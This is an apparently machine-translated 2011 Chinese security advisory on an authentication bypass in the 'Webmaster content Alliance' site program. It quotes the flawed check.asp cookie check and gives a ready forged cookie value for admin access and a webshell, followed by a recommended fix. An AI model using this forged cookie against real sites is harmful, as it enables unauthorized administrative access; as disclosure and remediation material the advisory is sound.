Webmaster content Alliance background Cookie spoofing exploit-vulnerability warning-the black bar safety net

2011-04-18T00:00:00
ID MYHACK58:62201130111
Type myhack58
Reporter 佚名
Modified 2011-04-18T00:00:00

Description

Webmaster content Alliance is domestic the most widely used of a thief program, but its background verification is not strictly, by the cookie trick, you can bypass the authentication directly into the background, get a webshell in. Website content Alliance, presumably most webmasters are aware of, perhaps joined by one or more of the Alliance. Perhaps some newcomers do not understand, here is a brief introduction about the site content Alliance features:

1, The Free has independent channels, the Union organizers responsible for the updating and maintenance of affiliate webmasters sit back and enjoy; the

2, the affiliate sites are generally the default uniform template, but the webmaster can set up a website head and tail;

3, the webmasters have their own advertising, you can set yourself, and some have to promote the Commission of the Commission; and

4, to join the site and sponsor site visits to promote each other, greatly improving website ranking.

The exploit: the

Verify that the file check. asp vulnerability in the code as follows:

dim CheckAdmin,CheckAdminAll,Administer,tempAdmin,tadmin,Flag,Purview,AdminName if md5(request. cookies("rand")&request. cookies("AdminName")&request. cookies("adminid"))<>request. cookies("check") then errmsg=errmsg+ "<BR>"+"<li>no permissions or login timeout, please press OK to return to re-login." call Error_Msg(Errmsg) response. end end if

cookie spoofing vulnerability it is obvious, as long as the rand+AdminName+adminid md5 ciphertext and the check match can be.

!

The modified cookie to check=802e5e662c4ebe86c497b15afe0b58fd; rand=1; AdminName=admin

Fix: this system is recommended to use session authentication, or cookie authentication with read from the database password.

Author: yeweit6